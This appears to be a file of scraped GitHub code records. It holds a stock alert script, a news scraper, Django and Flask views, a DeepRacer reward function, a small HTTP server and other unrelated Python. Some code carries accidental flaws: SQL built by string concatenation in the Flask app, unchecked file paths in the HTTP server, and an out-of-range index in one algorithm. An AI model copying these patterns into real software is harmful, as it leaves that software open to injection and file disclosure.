market = 0\n else:\n market = 1\n data = api.get_security_bars(category=9, market=market, code=code, start=start, count=MA_DAY-1)\n pd_df = api.to_df(data)\n ma = pd_df['close'].mean()\n last_close = pd_df[-1:]['close'].values[0]\n\n # 对全局变量赋值 避免重复计算\n dict_code_last_close[code] = last_close\n dict_code_ma[code] = ma\n\n return ma, last_close\n\n\n# 从本地文件中读取股票的历史数据并计算MA20, 获取指定代码号的股票上一日收盘价及对应的均线信息\ndef get_history_data(code, MA_DAY=20):\n \"\"\"\n :param code: 股票代码:如:000001\n :return: 股票代码对应的数据,按照日期倒叙排好\n \"\"\"\n #首选查内存,有直接取数据,读表计算\n if code in dict_code_ma.keys():\n ma = dict_code_ma[code]\n last_close = dict_code_last_close[code]\n return ma, last_close\n base_dir = r\"E:\\deeplearning\\stock-data-validation\\data\\base_data_csv\"\n code_data_file = os.path.join(base_dir, code + \".csv\")\n code_data_df = pd.read_csv(code_data_file, names=[\"date\", \"OPEN\", \"HIGH\", \"LOW\", \"CLOSE\", \"VOLUME\"])\n code_data_df[\"date\"] = code_data_df[\"date\"].apply(int)\n code_data_df = code_data_df.sort_values(by=[\"date\"], axis=0, ascending=False)[: MA_DAY-1]\n last_close = code_data_df.values.tolist()[0][4]\n ma = code_data_df[\"CLOSE\"].mean()\n #对全局变量赋值 避免重复计算\n dict_code_last_close[code] = last_close\n dict_code_ma[code] = ma\n return ma, last_close\n\n\ndef get_now_data(code_list):\n # 新浪 ['sina'] 腾讯 ['tencent', 'qq']\n mail = random.sample([\"tencent\", \"sina\", \"qq\"], k=1)[0]\n try:\n quotation = easyquotation.use(mail)\n\n # 获取所有股票行情\n quotation.market_snapshot(prefix=False) # prefix 参数指定返回的行情字典中的股票代码 key 是否带 sz/sh 前缀\n # 单只股票\n # quotation.real(code) # 支持直接指定前缀,如 'sh000001'\n # 多只股票\n # quotation.stocks(['000001', '162411'])\n return quotation.stocks(code_list)\n\n except Exception as err:\n time_error = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n print(\"频繁请求:报错时间:{}\".format(time_error))\n time.sleep(2)\n err_log = traceback.format_exc()\n print(str(err_log))\n return {}\n\n\n# 读取自选股中历史数据\ndef get_zixuan_data():\n \"\"\"\n :return: 返回战法对应的选股股票 key 为日期 如 20210714 value 为当天选出来的股票 一个list ; 如{\"20210804\":[000001,600003]}\n \"\"\"\n # 自选文件夹\n data_file_dir = r\"D:\\tdx\\T0002\\blocknew\"\n file_path = os.path.join(data_file_dir, \"ZXG.blk\")\n with open(file_path, encoding=\"utf-8\") as f:\n code_str = f.readlines()\n # 只返回股票,不返回基金\n code_list = [str(elem).strip()[1:7] for elem in code_str if len(elem) > 2 and str(elem)[1] in ('0', '3', '6')]\n return code_list\n\n\nif __name__ == \"__main__\":\n\n code_list = get_zixuan_data()\n\n have_code_list = []\n zixuan_list = []\n for i, code in enumerate(code_list):\n if code != \"159949\":\n have_code_list.append(code)\n else:\n if i < len(code_list)-1:\n zixuan_list = code_list[i+1:]\n break\n\n print(\"您的持仓股为:{}\".format(\",\".join(have_code_list)))\n print(\"您的自选股为:{}\".format(\",\".join(zixuan_list)))\n\n dt = get_format_day(0)\n morning_begin_time = dt + \" \" + \"09:25:00\"\n morning_end_time = dt + \" \" + \"11:30:00\"\n afternoon_begin_time = dt + \" \" + \"13:00:00\"\n afternoon_end_time = dt + \" \" + \"15:00:00\"\n time_stamp_begin_1 = time.mktime(time.strptime(morning_begin_time, '%Y-%m-%d %H:%M:%S'))\n time_stamp_end_1 = time.mktime(time.strptime(morning_end_time, '%Y-%m-%d %H:%M:%S'))\n time_stamp_begin_2 = time.mktime(time.strptime(afternoon_begin_time, '%Y-%m-%d %H:%M:%S'))\n time_stamp_end_2 = time.mktime(time.strptime(afternoon_end_time, '%Y-%m-%d %H:%M:%S'))\n\n # 9:25---15:00\n now_time = int(time.time())\n while True: # time_stamp_begin_1 < now_time < time_stamp_end_2:\n now_time = int(time.time())\n\n # 
9:30 以前 or 15:00 以后\n while now_time < time_stamp_end_1 or now_time > time_stamp_begin_2:\n time.sleep(30)\n now_time = int(time.time())\n\n # 11:30 - 13:00\n while time_stamp_end_1 < now_time < time_stamp_begin_2:\n time.sleep(3)\n now_time = int(time.time())\n\n # 统计已发送邮件的次数,超过100 停止运行\n send_times = 0\n for _, t in send_email_times.items():\n send_times += t\n if send_times > 100:\n break\n\n ma_day = 20\n now_have_data_dict = get_now_data(have_code_list)\n if len(now_have_data_dict) == 0:\n\n time.sleep(10)\n continue\n # 持有的股票 ,涨幅超过五个点提醒, 跌幅超过三个点,跌破二十日线提醒\n for code in have_code_list:\n ma, last_close = get_history_data_pytdx(code, ma_day)\n now_price = now_have_data_dict[code]['now']\n name = now_have_data_dict[code]['name']\n ma_price = (ma * (ma_day - 1) + now_price) / ma_day\n\n if last_close*0.97 >= now_price:\n times = send_email_times.get(code, 0)\n if times <= 2:\n send_email(\"【雪球邮件订阅】\", \"您的持仓:【{}】跌幅超过 3%, 请火速关注\".format(name))\n else:\n send_email_times[code] += 1\n\n if last_close*1.05 <= now_price:\n times = send_email_times.get(code, 0)\n if times <= 2:\n send_email(\"【雪球邮件订阅】\", \"您的持仓:【{}】涨幅超过 5%,请火速关注\".format(name))\n else:\n send_email_times[code] += 1\n # 昨日还在均线之上,今日跌破提醒, 昨日就在均线之下 不用提醒\n if now_price <= ma_price and (last_close - ma_price)/ma_price >= 0.01:\n times = send_email_times.get(code, 0)\n if times <= 2:\n send_email(\"【雪球邮件订阅】\", \"您的持仓:【{}】跌破均线,请火速关注\".format(name))\n else:\n send_email_times[code] += 1\n\n print(\"持仓监控完毕\")\n # 自选股下跌提醒\n now_zixuan_data_dict = get_now_data(zixuan_list)\n\n if len(now_zixuan_data_dict) == 0:\n time.sleep(10)\n continue\n\n for code in zixuan_list:\n ma, last_close = get_history_data_pytdx(code, MA_DAY=ma_day)\n now_price = now_zixuan_data_dict[code]['now']\n open_price = now_zixuan_data_dict[code]['open']\n ma_price = (ma * (ma_day - 1) + now_price) / ma_day\n name = now_zixuan_data_dict[code][\"name\"]\n\n if now_price <= last_close * 0.95:\n times = send_email_times.get(code, 0)\n if times <= 3:\n send_email(\"【雪球邮件订阅】\", \"您关注的【{}】跌幅超过 5%,请火速关注\".format(name))\n else:\n send_email_times[code] += 1\n\n if now_price <= last_close * 0.965:\n times = send_email_times.get(code, 0)\n if times == 0:\n send_email(\"【雪球邮件订阅】\", \"您关注的【{}】跌幅超过 3.5%,请火速关注\".format(name))\n else:\n send_email_times[code] += 1\n\n if abs((now_price - ma_price)/ma_price) <= 0.02 and (last_close - ma_price)/ma_price >= 0.02:\n times = send_email_times.get(code, 0)\n if times <= 2:\n send_email(\"【雪球邮件订阅】\", \"您关注的【{}】回落20均线附近, 请火速关注\".format(name))\n else:\n send_email_times[code] += 1\n now_time = int(time.time())\n time.sleep(1)\n print(\"自选监控完毕\")\n\n # 下午三点之后, 九点半之前\n # now_time = int(time.time())\n # if now_time > time_stamp_end_2 or now_time < time_stamp_begin_1:\n # print(\"非交易时间休息5分钟\")\n # time.sleep(60 * 5)\n\n","repo_name":"testinWang/backtrade","sub_path":"util/StockReceive.py","file_name":"StockReceive.py","file_ext":"py","file_size_in_byte":11626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379745707","text":"from absl.testing import absltest\nimport numpy as np\nfrom open_spiel.python import rl_environment\nfrom open_spiel.python.algorithms import random_agent\n\n\nclass RandomAgentTest(absltest.TestCase):\n\n def test_step(self):\n agent = random_agent.RandomAgent(player_id=0, num_actions=10)\n\n legal_actions = [0, 2, 3, 5]\n time_step = rl_environment.TimeStep(\n observations={\n \"info_state\": [[0], [1]],\n \"legal_actions\": [legal_actions, []],\n 
\"current_player\": 0\n },\n rewards=None,\n discounts=None,\n step_type=None)\n agent_output = agent.step(time_step)\n\n self.assertIn(agent_output.action, legal_actions)\n self.assertAlmostEqual(sum(agent_output.probs), 1.0)\n self.assertEqual(\n len([x for x in agent_output.probs if x > 0]), len(legal_actions))\n self.assertTrue(\n np.allclose(agent_output.probs[legal_actions], [.25] * 4, atol=1e-5))\n\n\nif __name__ == \"__main__\":\n absltest.main()\n","repo_name":"deepmind/open_spiel","sub_path":"open_spiel/python/algorithms/random_agent_test.py","file_name":"random_agent_test.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":3700,"dataset":"github-code","pt":"37"} +{"seq_id":"32625859565","text":"# Solution to the smallest difference problem\n\n# Looks like the difference we're considering is absolute\n# Pointer movement should ensure that this difference is a small as possible\n\n# O(n lg n + m lg m) time | O(1) space\ndef smallest_difference(arr1, arr2):\n arr1.sort()\n arr2.sort()\n\n first = 0 # Pointer to arr1\n second = 0 # Pointer to arr2\n\n while first < len(arr1) and second < len(arr2):\n difference = abs(arr1[first] - arr2[second])\n\n if abs(arr1[first+1] - arr2[second]) < difference:\n first += 1\n \n elif abs(arr1[first] - arr2[second+1]) < difference:\n second += 1\n \n else:\n break\n \n return [arr1[first], arr2[second]]\n\n\nif __name__ == \"__main__\":\n arr1 = [-1, 5, 10, 20, 28, 3]\n arr2 = [26, 134, 135, 15, 17]\n\n result = smallest_difference(arr1, arr2)\n\n assert result == [28, 26], \"Not quite there yet.\"\n\n print(\"You're all set!\")","repo_name":"tobeyOguney/Zoo-of-Algorithms","sub_path":"Smallest Difference/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"71264940267","text":"from __future__ import unicode_literals\n\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse\nfrom django.http.response import HttpResponseRedirect\nfrom django.utils.encoding import force_text\nfrom django.utils.translation import ugettext as _\nfrom django.views.generic import DetailView\n\nfrom shoop.admin.toolbar import PostActionButton, Toolbar, URLActionButton\nfrom shoop.admin.utils.urls import get_model_url\nfrom shoop.apps.provides import get_provide_objects\nfrom shoop.core.models import Order, OrderStatus, OrderStatusRole\nfrom shoop.utils.excs import Problem\n\n\nclass OrderDetailView(DetailView):\n model = Order\n template_name = \"shoop/admin/orders/detail.jinja\"\n context_object_name = \"order\"\n\n def get_toolbar(self):\n order = self.object\n toolbar = Toolbar()\n toolbar.append(URLActionButton(\n text=_(\"Create Shipment\"),\n icon=\"fa fa-truck\",\n disable_reason=_(\"There are no products to ship\") if not order.get_unshipped_products() else None,\n url=reverse(\"shoop_admin:order.create-shipment\", kwargs={\"pk\": order.pk}),\n extra_css_class=\"btn-info\"\n ))\n\n toolbar.append(PostActionButton(\n post_url=reverse(\"shoop_admin:order.set-status\", kwargs={\"pk\": order.pk}),\n name=\"status\",\n value=OrderStatus.objects.get_default_complete().pk,\n text=_(\"Set Complete\"),\n icon=\"fa fa-check-circle\",\n disable_reason=(\n _(\"This order can not be set as complete at this point\")\n if not order.can_set_complete()\n else None\n ),\n extra_css_class=\"btn-success\"\n ))\n\n for button in 
get_provide_objects(\"admin_order_toolbar_button\"):\n toolbar.append(button(order))\n\n return toolbar\n\n def get_context_data(self, **kwargs):\n context = super(OrderDetailView, self).get_context_data(**kwargs)\n context[\"toolbar\"] = self.get_toolbar()\n context[\"title\"] = force_text(self.object)\n return context\n\n\nclass OrderSetStatusView(DetailView):\n model = Order\n\n def get(self, request, *args, **kwargs):\n return HttpResponseRedirect(get_model_url(self.get_object()))\n\n def post(self, request, *args, **kwargs):\n order = self.object = self.get_object()\n new_status = OrderStatus.objects.get(pk=int(request.POST[\"status\"]))\n if new_status.role == OrderStatusRole.COMPLETE and not order.can_set_complete():\n raise Problem(_(\"Unable to set order as completed at this point\"))\n old_status = order.status\n order.status = new_status\n order.save(update_fields=(\"status\",))\n message = _(\"Order status changed: %s to %s\") % (old_status, new_status)\n order.add_log_entry(message, user=request.user, identifier=\"status_change\")\n messages.success(self.request, message)\n\n return HttpResponseRedirect(get_model_url(self.get_object()))\n","repo_name":"if413019/ShoopDevelopment","sub_path":"shoop/admin/modules/orders/views/detail.py","file_name":"detail.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38121303698","text":"import os\nfrom setuptools import (\n find_packages,\n setup,\n)\n\nversion = {}\nwith open(\"./oidc_provider/version.py\") as fp:\n exec(fp.read(), version)\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n name='django-oidc-provider',\n version=version['__version__'],\n packages=find_packages(),\n include_package_data=True,\n license='MIT License',\n description='OpenID Connect Provider implementation for Django.',\n long_description='http://github.com/juanifioren/django-oidc-provider',\n url='http://github.com/juanifioren/django-oidc-provider',\n author='Juan Ignacio Fiorentino',\n author_email='juanifioren@gmail.com',\n zip_safe=False,\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n 'Programming Language :: Python :: 3.10',\n 'Programming Language :: Python :: 3.11',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n ],\n test_suite='runtests.runtests',\n tests_require=[\n 'pyjwkest>=1.3.0',\n 'mock>=2.0.0',\n ],\n\n install_requires=[\n 'pyjwkest>=1.3.0',\n ],\n)\n","repo_name":"juanifioren/django-oidc-provider","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":386,"dataset":"github-code","pt":"37"} +{"seq_id":"72039865066","text":"import numpy as np\nimport cv2\n \nim = cv2.imread('amundi.jpg')\nimgray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)\nret,thresh = cv2.threshold(imgray,127,255,0)\ncontours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\n\ncv2.drawContours(im,contours,-1,(0,255,0),3)\n\ncv2.imwrite(\"res.jpg\", 
im)\n","repo_name":"fduraffourg/utils","sub_path":"opencv/contours.py","file_name":"contours.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"73989668586","text":"'''\nDavide Denicolò\nN° matricola 0000879677\nTraccia Numero 2 Progetto di Programmazione a oggetti.\nSi immagini di dover realizzare un Web Server in Python per\nuna azienda ospedaliera. I requisiti del Web Server sono i\nseguenti:\n• Il web server deve consentire l’accesso a più utenti in contemporanea\n• La pagina iniziale deve consentire di visualizzare la lista\ndei servizi erogati dall’azienda ospedaliera e per ogni\nservizio avere un link di riferimento ad una pagina\ndedicata.\n• L’interruzione da tastiera (o da console) dell’esecuzione\ndel web server deve essere opportunamente gestita in\nmodo da liberare la risorsa socket.\n• Nella pagina principale dovrà anche essere presente un\nlink per il download di un file pdf da parte del browser\n• Come requisito facoltativo si chiede di autenticare gli\nutenti nella fase iniziale della connessione.\n'''\n\n\nimport signal\nimport sys\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom socketserver import ThreadingMixIn\nfrom datetime import datetime\nimport pytz\nimport feedparser\n\n#Creazione dell'Handler per gestire le richieste GET dal client.\nclass Serv(BaseHTTPRequestHandler):\n\n def do_GET(self):\n if self.path == '/':\n self.path = '/index.html'\n try:\n if self.path == '/notizie.html':\n feed_creator()\n file_to_open = open(self.path[1:]).read()\n self.send_response(200)\n print(\"E' arrivata una richiesta al server\")\n except:\n file_to_open = \"File not found\"\n self.send_response(404)\n self.end_headers()\n self.wfile.write(bytes(file_to_open, 'utf-8'))\n\n\n# Indica la porta ove lavorare, di default sarà la 8081.\nif sys.argv[1:]:\n port = int(sys.argv[1])\nelse:\n port = 8081\n\n\n#Varie variabili HTML.\nfooter = \"\"\"\n \n\n\"\"\"\n\nheader_html = \"\"\"\n\n \n \n \n \n Sezione notizie salute\n\"\"\"\n\nnavigation_bar = \"\"\"\n\n\n\n
\n
\n
\n

\n \n\"\"\".format(port=port)\n\n\n#Funzione che mi permette di aggiungere le informazioni riguardo a un singolo RSS in una variabile messaggio.\n#Ci andrò poi ad aggiungere dei tag html poiche finirà in un file HTML apposito.\ndef add_element(i, message, title, desc, link, info):\n if i == 0:\n now_italy = pytz.timezone('Europe/Rome')\n current_time = datetime.now(now_italy)\n message = \"

\" + current_time.strftime(\"%H:%M:%S\") + \"

\"\n message = message \\\n + \"

\" + title + \"


\" \\\n + \"

\" + desc + \"
\" \\\n + \"\" + link + \"
\" \\\n + info + \"


\"\n return message\n\n\n#Creo ufficialmente la pagina che espone le notizie.\ndef home_creator(message):\n f = open('notizie.html', 'w', encoding=\"utf-8\")\n f.write(header_html + \"

Notizie | Home

\"\n + navigation_bar + \"
\" + message + footer)\n f.close()\n \n#Funzione che permette di prendere le RSS dal corriere\n#Mano a mano che leggo le notizie le formatto in un formato HTML e le scrivo sul file html Notizie.html.\ndef feed_creator():\n feed = feedparser.parse(\"https://xml2.corriereobjects.it/rss/salute.xml\")\n\n message = ''\n i = 0\n for entry in feed.entries:\n article_title = entry.title\n article_desc = entry.description\n article_link = entry.link\n article_info = entry.category\n\n message = add_element(i, message, article_title, article_desc, article_link, article_info)\n if i == 0:\n i += 1\n\n f = open('notizie.html', 'w', encoding=\"utf-8\")\n f.write(message)\n f.close()\n\n home_creator(message)\n\n#Gestione del segnale di uscita, quando si preme CTRL-C si deallocheranno le risorse.\ndef signal_handler(signal, frame):\n print('Exiting http server (Ctrl+C pressed)')\n try:\n if server:\n server.server_close()\n finally:\n sys.exit(0)\n\n\nclass ThreadedHTTPServer(ThreadingMixIn, HTTPServer):\n \"\"\"Gestisco le richieste in un altro thread.\"\"\"\n\n#Eseguo il main.\nif __name__ == '__main__':\n server = ThreadedHTTPServer(('localhost', port), Serv)\n print('Starting server, use to stop')\n signal.signal(signal.SIGINT, signal_handler)\n feed_creator()\n server.serve_forever()\n\n\n\n\n\n\n","repo_name":"davidedenicolo99/progReti","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24076388521","text":"import math\n\n\ndef reward_function(params):\n limit_params = {\n 'optimal_speed': 2.5,\n 'standard_speed': 1.5,\n 'minimum_speed': 1.0,\n 'steering_limit': 10.0,\n 'straight_line_direction_limit': 5.0,\n 'optimal_reward_l1': 2.5,\n 'optimal_reward_l2': 1.8,\n 'standard_reward_l1': 1.5,\n 'standard_reward_l2': 0.9,\n 'minimum_reward_l1': 0.6,\n 'minimum_reward_l2': 0.3,\n 'steps_per_second': 15\n }\n\n x = params['x']\n y = params['y']\n on_track = params['all_wheels_on_track']\n distance_from_center = params['distance_from_center']\n track_width = params['track_width']\n steering = params['steering_angle']\n speed = params['speed']\n waypoints = params['waypoints']\n closest_waypoints = params['closest_waypoints']\n heading = params['heading']\n is_left_of_center = params['is_left_of_center']\n\n reward = 1e-3\n\n # get the next 3 points\n np = waypoints[closest_waypoints[1]]\n np1 = waypoints[(closest_waypoints[1] + 1) % len(waypoints)]\n np2 = waypoints[(closest_waypoints[1] + 2) % len(waypoints)]\n\n # distance checking to make sure the agent is heading to the right direction\n distance_p0 = distance_of_2points(waypoints[closest_waypoints[0]], [x, y])\n distance_p = distance_of_2points(np, [x, y])\n distance_p1 = distance_of_2points(np1, [x, y])\n distance_p2 = distance_of_2points(np2, [x, y])\n\n # projected position of the agent\n new_x = x + speed / limit_params['steps_per_second'] * math.cos(\n math.radians(heading + steering / limit_params['steps_per_second']))\n new_y = y + speed / limit_params['steps_per_second'] * math.sin(\n math.radians(heading + steering / limit_params['steps_per_second']))\n\n new_distance_p0 = distance_of_2points(waypoints[closest_waypoints[0]], [new_x, new_y])\n new_distance_p = distance_of_2points(np, [new_x, new_y])\n new_distance_p1 = distance_of_2points(np1, [new_x, new_y])\n new_distance_p2 = distance_of_2points(np2, [new_x, new_y])\n\n agent_going_to_right_direction = False\n if distance_p0 <= 
new_distance_p0 and distance_p1 >= new_distance_p1 and distance_p2 >= new_distance_p2:\n agent_going_to_right_direction = True\n\n # the agent direction to next 3 points\n direction_np = directions_of_2points([x, y], np)\n direction_np1 = directions_of_2points([x, y], np1)\n direction_np2 = directions_of_2points([x, y], np2)\n\n direction_np_diff = abs(direction_np - heading - steering / limit_params['steps_per_second'])\n if direction_np_diff > 180:\n direction_np = 360 - direction_np\n\n direction_np1_diff = abs(direction_np1 - heading - steering / limit_params['steps_per_second'])\n if direction_np1_diff > 180:\n direction_np1 = 360 - direction_np1\n\n direction_np2_diff = abs(direction_np2 - heading - steering / limit_params['steps_per_second'])\n if direction_np2_diff > 180:\n direction_np2 = 360 - direction_np2\n\n direction_np2_np_diff = abs(direction_np2 - direction_np)\n if direction_np2_np_diff > 180:\n direction_np2_np_diff = 360 - direction_np2_np_diff\n\n if agent_going_to_right_direction and on_track:\n if speed >= limit_params['optimal_speed']:\n if (is_left_of_center and 0 >= steering / limit_params['steps_per_second'] >= -1 * limit_params[\n 'steering_limit']) or \\\n (not is_left_of_center and 0 <= steering / limit_params['steps_per_second'] <= limit_params[\n 'steering_limit']):\n if direction_np1_diff <= limit_params['straight_line_direction_limit']:\n reward = limit_params['optimal_reward_l1']\n elif direction_np1_diff <= direction_np2_np_diff:\n reward = limit_params['optimal_reward_l2']\n elif speed >= limit_params['standard_speed']:\n if direction_np1_diff <= limit_params['straight_line_direction_limit']:\n reward = limit_params['standard_reward_l1']\n elif direction_np1_diff <= direction_np2_np_diff:\n reward = limit_params['standard_reward_l2']\n elif speed >= limit_params['minimum_speed']:\n if direction_np1_diff <= limit_params['straight_line_direction_limit']:\n reward = limit_params['minimum_reward_l1']\n elif direction_np1_diff <= direction_np2_np_diff:\n reward = limit_params['minimum_reward_l2']\n\n return float(reward)\n\n\ndef reward_function_maximum(params):\n # track_width = params['track_width']\n # waypoints = params['waypoints']\n # closest_waypoints = params['closest_waypoints']\n # steps = params['steps']\n # progress = params['progress']\n #\n # x = waypoints[closest_waypoints[1]][0]\n # y = waypoints[closest_waypoints[1]][1]\n # distance_from_center = 0.0\n # steering_angle = 0.0\n # speed = 4.0\n # heading = directions_of_2points(waypoints[closest_waypoints[0]], waypoints[closest_waypoints[1]])\n # is_left_of_center = True\n # on_track = True\n #\n # maximum_params = {\n # 'track_width': track_width,\n # 'waypoints': waypoints,\n # 'closest_waypoints': closest_waypoints,\n # 'steps': steps,\n # 'progress': progress,\n # 'x': x,\n # 'y': y,\n # 'distance_from_center': distance_from_center,\n # 'steering_angle': steering_angle,\n # 'speed': speed,\n # 'heading': heading,\n # 'is_left_of_center': is_left_of_center,\n # 'all_wheels_on_track': on_track\n # }\n\n # reward = reward_function(maximum_params)\n reward = 2.5\n\n return float(reward)\n\n\ndef minimum_reward(params):\n track_width = params['track_width']\n waypoints = params['waypoints']\n closest_waypoints = params['closest_waypoints']\n steps = params['steps']\n progress = params['progress']\n\n x = waypoints[closest_waypoints[1]][0] + track_width\n y = waypoints[closest_waypoints[1]][1] + track_width\n distance_from_center = 0.5 * track_width\n steering_angle = 30\n speed = 0.1\n heading 
= -1 * directions_of_2points(waypoints[closest_waypoints[0]], waypoints[closest_waypoints[1]])\n is_left_of_center = True\n on_track = False\n\n minimum_params = {\n 'track_width': track_width,\n 'waypoints': waypoints,\n 'closest_waypoints': closest_waypoints,\n 'steps': steps,\n 'progress': progress,\n 'x': x,\n 'y': y,\n 'distance_from_center': distance_from_center,\n 'steering_angle': steering_angle,\n 'speed': speed,\n 'heading': heading,\n 'is_left_of_center': is_left_of_center,\n 'all_wheels_on_track': on_track\n }\n\n reward = reward_function(minimum_params)\n\n return float(reward)\n\n\ndef distance_of_2points(p1, p2):\n return ((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2) ** 0.5\n\n\ndef directions_of_2points(p1, p2):\n directions = math.atan2(p2[1] - p1[1], p2[0] - p1[0])\n directions = math.degrees(directions)\n return directions\n","repo_name":"Genral0113/myPython","sub_path":"aws_deepracer/track2019v1.py","file_name":"track2019v1.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30721301909","text":"# Approach 1 - Recursive\n# O(N), O(H)\nclass Solution:\n def isSameTree(self, p: Optional[TreeNode], q: Optional[TreeNode]) -> bool:\n if not p or not q:\n return p == q\n\n sameSoFar = (p.val == q.val)\n\n return sameSoFar and self.isSameTree(p.left, q.left) and self.isSameTree(p.right, q.right)\n\n\n# Approach 2 - Iterative\n# The trick here is to store the null values in the queue, if you ignore them it will be wrong\n# Consider [1, null, 2] and [1, 2, null] - If you don't store null it will be True and that's wrong\n# O(N), O(N)\nclass Solution:\n def isSameTree(self, p: Optional[TreeNode], q: Optional[TreeNode]) -> bool:\n q = collections.deque([(p, q)])\n while len(q) != 0:\n i, j = q.popleft()\n if not i and not j:\n continue\n if not i or not j:\n return False\n if i.val != j.val:\n return False\n\n q.append([i.left, j.left])\n q.append([i.right, j.right])\n return True\n","repo_name":"nikhiljsk/Strivers_SDE_Sheet","sub_path":"18_Binary_Tree_Part_II/18.6_Check_if_two_trees_are_identical_or_not.py","file_name":"18.6_Check_if_two_trees_are_identical_or_not.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"7250379402","text":"import pandas as pd\n\nfrom stock.train import add_put_call_features, add_ticker_features\nfrom common.lgb import LGBModel\n\ndef main():\n path = 'data'\n df = pd.read_csv(f'{path}/spy.csv')\n add_ticker_features(df, 'spy')\n df = add_put_call_features(df, path)\n df.dropna(inplace=True)\n\n feat_cols = []\n for c in df.columns:\n if c.startswith('spy_d') or c.startswith('pc_'):\n feat_cols.append(c)\n\n train_end = int(len(df) * 3 / 5)\n model = LGBModel('pc_spy_lgb', path, 'timestamp', 'target', 5, feat_cols)\n model.predict(df.iloc[train_end:])\n\n print('done')\n\nif __name__ == '__main__':\n main()","repo_name":"looselyconnected/fastai","sub_path":"stock/pc_spy_pred.py","file_name":"pc_spy_pred.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6113144242","text":"\nfrom datetime import datetime, timedelta\nimport locale\nimport platform\nfrom bs4 import BeautifulSoup\n\nfrom webapp.news.parsers.utils import get_html, save_news\nfrom webapp.db import db\nfrom webapp.news.models import News\n\n\n\nif platform.system() == 'Windows':\n 
locale.setlocale(locale.LC_ALL, \"russian\")\nelse:\n    locale.setlocale(locale.LC_TIME, 'ru_RU')\n\n\ndef parse_habr_date(date_str):\n\tif \"сегодня\" in date_str:\n\t\ttoday = datetime.now()\n\t\tdate_str = date_str.replace(\"сегодня\", today.strftime('%d %B %Y'))\n\telif \"вчера\" in date_str:\n\t\tyesterday = datetime.now() - timedelta(days=1)\n\t\tdate_str = date_str.replace(\"вчера\", yesterday.strftime('%d %B %Y'))\n\ttry:\n\t\treturn datetime.strptime(date_str, '%d %B %Y в %H:%M')\n\texcept ValueError:\n\t\treturn datetime.now()\n\n\ndef get_habr_snippets():\n    html = get_html('https://habr.com/ru/search/?target_type=posts&q=python&order_by=date')\n    if html:\n        soup = BeautifulSoup(html, 'html.parser')\n        all_news = soup.find('ul', class_='content-list_posts').findAll('li', class_='content-list__item_post')\n        for news in all_news:\n            title = news.find('a', class_=\"post__title_link\").text\n            url = news.find('a', class_=\"post__title_link\")[\"href\"]\n            published = news.find('span', class_='post__time').text\n            published = parse_habr_date(published)\n            save_news(title, url, published)\n\n\ndef get_news_content():\n    news_without_text = News.query.filter(News.text.is_(None))\n    for news in news_without_text:\n        html = get_html(news.url)\n        if html:\n            soup = BeautifulSoup(html, 'html.parser')\n            article = soup.find('div', class_='post__text-html').decode_contents()\n            if article:\n                news.text = article\n                db.session.add(news)\n                db.session.commit()","repo_name":"Sinrez/learn_python_course","sub_path":"web_module_blurprint/webapp/news/parsers/habr.py","file_name":"habr.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"23426573293","text":"from flask import Flask, render_template, request, redirect, flash, session\nfrom mysqlconnection import MySQLConnector\nimport re\n\napp = Flask(__name__)\napp.secret_key = 'supersecret'\n\nmysql = MySQLConnector(app, 'friends')\nname_regex = re.compile(r'^[a-zA-Z]+$')\n\n@app.route('/')\ndef index():\n    friends = mysql.query_db(\"SELECT * FROM users\")\n    return render_template('index.html', friends = friends)\n\n@app.route('/friends', methods=['POST'])\ndef create():\n    if validate_name(request.form['fname']) and validate_name(request.form['lname']):\n        query = \"INSERT INTO users (first_name, last_name, created_at, updated_at) VALUES (:first_name, :last_name, NOW(), NOW())\"\n        data = {\n            'first_name' : request.form['fname'],\n            'last_name' : request.form['lname']\n        }\n        mysql.query_db(query, data)\n    else:\n        flash(\"Please enter a valid name (no numbers or symbols)\")\n    return redirect('/')\n\n@app.route('/friends/<id>/edit')\ndef edit(id):\n    friend_info = mysql.query_db(\"SELECT first_name, last_name, id FROM users WHERE id = \" + id)\n    return render_template('friend.html', friend_info = friend_info)\n\n@app.route('/friends/<id>', methods=['POST'])\ndef update(id):\n    if validate_name(request.form['fname']) and validate_name(request.form['lname']):\n        query = \"UPDATE users SET first_name = 